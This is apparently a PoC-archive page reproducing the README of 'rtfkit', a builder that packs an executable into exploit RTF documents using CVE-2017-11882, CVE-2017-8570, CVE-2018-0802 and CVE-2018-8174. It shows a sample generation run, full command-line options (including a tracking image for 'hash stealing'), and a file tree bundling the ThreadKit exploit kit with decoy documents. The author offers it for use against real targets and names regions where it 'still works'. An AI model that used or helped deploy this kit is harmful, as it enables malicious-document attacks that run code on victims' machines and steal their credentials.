Related vulnerability
Title:
Microsoft Office security vulnerability
(CVE-2017-11882)
Description: Microsoft Office 2007 SP3 and related releases are office software suite products developed by Microsoft Corporation (US). A remote code execution vulnerability exists in Microsoft Office, caused by the program failing to properly handle objects in memory. A remote attacker can exploit this vulnerability via a specially crafted file to execute arbitrary code in the context of the current user. The following versions are affected: Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016.
Description
Generates RTF exploit payloads. Uses CVE-2017-11882, CVE-2017-8570, CVE-2018-0802, and CVE-2018-8174.
Introduction
My RTF exploit kit from a couple of years ago. You're on your own for AV evasion. Still works well against certain targets. Especially in the Middle East, parts of Asia, former Soviet bloc, etc.

Also included is a copy of the [threadkit](https://www.proofpoint.com/us/threat-insight/post/unraveling-ThreadKit-new-document-exploit-builder-distribute-The-Trick-Formbook-Loki-Bot-malware) exploit kit, courtesy of [the Russians](https://cyware.com/news/cobalt-gang-found-using-new-version-of-threadkit-exploit-kit-dubbed-cobint-e523901f/).

<3
rtfkit takes an executable and packs it into an RTF with some public pre-compiled exploits.
Usage
=====
Basically this:

```
$ ./generate_rtf.py -p artifact.exe --out payload.rtf
[+] adding exploit equation1 (cve-2017-11882)
[+] adding exploit equation2 (cve-2018-0802)
[+] adding exploit composite (cve-2017-8570)
[.] writing rtf to payload.rtf
```
Full usage:

```
usage: generate_rtf.py [-h] [-D] [-l] [-u USE] [--use-cve USE_CVE]
                       [--exe-name EXE_NAME] [--template TEMPLATE]
                       [--fake-path FAKE_PATH] [-o OUT]
                       [--king-shellcode KING_SHELLCODE] [--king-url KING_URL]
                       [--king-html-out KING_HTML_OUT]
                       [--composite-sct COMPOSITE_SCT]
                       [--image-track IMAGE_TRACK] [-p PACKAGE]

optional arguments:
  -h, --help            show this help message and exit
  -D, --debug           enable debug
  -l, --list            list exploits and additions
  -u USE, --use USE     add exploit (see --list)
  --use-cve USE_CVE     add exploit (by CVE)
  --exe-name EXE_NAME   name for dropped EXE file (for exploits equation and
                        composite)
  --template TEMPLATE   RTF template to add exploit to (default:
                        resources/blank.rtf)
  --fake-path FAKE_PATH
                        fake path for packaged files (default: C:\Drivers)
  -o OUT, --out OUT     RTF output

king exploit:
  King exploit (CVE-2018-8174) options

  --king-shellcode KING_SHELLCODE
                        shellcode for CVE-2018-8174 (default:
                        resources/rtf_winexec.bin)
  --king-url KING_URL   URL where HTML will be hosted for king exploit (max:
                        39 chars)
  --king-html-out KING_HTML_OUT
                        output file for king HTML

composite exploit:
  Composite moniker exploit (CVE-2017-8570) options

  --composite-sct COMPOSITE_SCT
                        use this SCT file instead of generating one

additions:
  Additional things to add to the RTF

  --image-track IMAGE_TRACK
                        include an image from this URL, for tracking and hash
                        stealing
  -p PACKAGE, --package PACKAGE
                        files to add as packages. will by dropped in temp
                        (append fake name with colon)
```
File snapshot

```
[4.0K]  /data/pocs/fd392ea45cd36ac245feb5cfa0ad7252faf95458
├── [4.0K]  exploits
│   ├── [5.9K]  composite.py
│   ├── [ 13K]  CVE-2018-8174.rb
│   ├── [ 24K]  equation.py
│   ├── [   0]  __init__.py
│   ├── [ 107]  __init__.pyc
│   ├── [2.1K]  king.py
│   ├── [ 497]  king.pyc
│   └── [4.0K]  templates
│       ├── [ 450]  composite.sct
│       ├── [8.5K]  CVE-2018-8174.html
│       └── [5.1K]  CVE-2018-8174.rtf
├── [9.9K]  generate_rtf.py
├── [3.0K]  README.md
├── [4.0K]  resources
│   ├── [ 41K]  blank.rtf
│   ├── [ 285]  make_rtf_winexec.sh
│   ├── [ 550]  rtf_winexec.bin
│   └── [213K]  wordlist.txt
├── [2.9K]  rtf_package.py
├── [4.0K]  threadkit
│   ├── [4.0K]  analysis
│   │   ├── [ 44K]  builder_patched.py
│   │   ├── [6.2K]  builder.py
│   │   ├── [  92]  build_with_dll.bat
│   │   ├── [  92]  build_with_exe.bat
│   │   ├── [  95]  build_with_exe.sh
│   │   ├── [4.0K]  commands
│   │   │   ├── [2.2K]  dll.bat
│   │   │   ├── [1.5K]  exe.bat
│   │   │   ├── [ 488]  scriptlet.sct
│   │   │   └── [ 171]  task.bat
│   │   ├── [ 32K]  decoy.doc
│   │   ├── [ 68K]  dll.dll
│   │   ├── [ 49K]  enable_editing.jpg
│   │   ├── [ 68K]  exe.exe
│   │   ├── [3.1K]  hta
│   │   ├── [1.1K]  inner.php
│   │   ├── [ 172]  key.txt
│   │   ├── [ 520]  notes
│   │   ├── [2.4K]  packager.py
│   │   ├── [2.6K]  packager.pyc
│   │   ├── [1.6K]  ReadMe_ENG.txt
│   │   ├── [2.9K]  ReadMe_RU.txt
│   │   ├── [4.0K]  ready_exploit
│   │   │   ├── [318K]  Exploit.doc
│   │   │   └── [313K]  part_Decoded
│   │   ├── [ 151]  server2_content.py
│   │   ├── [ 37K]  server_code.py
│   │   ├── [ 16K]  template
│   │   └── [8.7K]  t.php
│   ├── [4.0K]  edit
│   │   ├── [7.4K]  builder.py
│   │   ├── [  92]  build_with_dll.bat
│   │   ├── [  92]  build_with_exe.bat
│   │   ├── [  74]  build_with_exe.sh
│   │   ├── [4.0K]  commands
│   │   │   ├── [2.2K]  dll.bat
│   │   │   ├── [1.5K]  exe.bat
│   │   │   ├── [ 488]  scriptlet.sct
│   │   │   └── [ 171]  task.bat
│   │   ├── [ 32K]  decoy.doc
│   │   ├── [ 68K]  dll.dll
│   │   ├── [ 49K]  enable_editing.jpg
│   │   ├── [ 68K]  exe.exe
│   │   ├── [ 172]  key.txt
│   │   ├── [7.4K]  nonet.py
│   │   ├── [2.4K]  packager.py
│   │   ├── [2.6K]  packager.pyc
│   │   ├── [1.6K]  ReadMe_ENG.txt
│   │   ├── [2.9K]  ReadMe_RU.txt
│   │   └── [4.0K]  ready_exploit
│   │       └── [318K]  Exploit.doc
│   └── [4.0K]  newline
│       ├── [6.1K]  builder.py
│       ├── [  92]  build_with_dll.bat
│       ├── [  92]  build_with_exe.bat
│       ├── [4.0K]  commands
│       │   ├── [2.2K]  dll.bat
│       │   ├── [1.5K]  exe.bat
│       │   ├── [ 488]  scriptlet.sct
│       │   └── [ 171]  task.bat
│       ├── [ 32K]  decoy.doc
│       ├── [ 68K]  dll.dll
│       ├── [ 49K]  enable_editing.jpg
│       ├── [ 68K]  exe.exe
│       ├── [ 172]  key.txt
│       ├── [2.4K]  packager.py
│       ├── [2.6K]  packager.pyc
│       ├── [1.6K]  ReadMe_ENG.txt
│       └── [2.9K]  ReadMe_RU.txt
└── [3.0K]  utils.py

12 directories, 80 files
```
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be accessed, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.